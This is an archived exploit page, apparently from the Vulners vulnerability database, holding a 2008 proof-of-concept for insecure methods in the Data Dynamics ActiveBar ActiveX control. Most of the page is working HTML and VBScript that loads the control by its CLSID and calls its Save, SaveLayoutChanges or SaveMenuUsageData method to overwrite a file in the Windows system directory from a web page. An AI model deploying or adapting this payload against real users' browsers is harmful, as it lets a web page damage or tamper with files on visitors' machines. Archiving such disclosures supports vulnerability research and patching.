Lucene search
dda-insecure.txt
Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Insecure Methods. Educational purpose only
Show more
`<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------
<b>Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Inscure Methods</b>
url: http://www.datadynamics.com
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>
------------------------------------------------------------------------------------
<object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'></object>
<select style="width: 404px" name="Pucca">
<option value = "Save">Save</option>
<option value = "SaveLayoutChanges">SaveLayoutChanges</option>
<option value = "SaveMenuUsageData">SaveMenuUsageData</option>
</select>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
on error resume next
Dim MyMsg
if Pucca.value = "Save" then
test.Save "", "c:\windows\system_.ini", 1
MyMsg = MsgBox("Exploit completed!")
elseif Pucca.value = "SaveLayoutChanges" then
test.SaveLayoutChanges "c:\windows\system_.ini", 1
MyMsg = MsgBox("Exploit completed!")
elseif Pucca.value = "SaveMenuUsageData" then
test.SaveMenuUsageData "c:\windows\system_.ini", 1
MyMsg = MsgBox("Exploit completed!")
end if
End Sub
</script></span></span></code></pre>
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo08 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4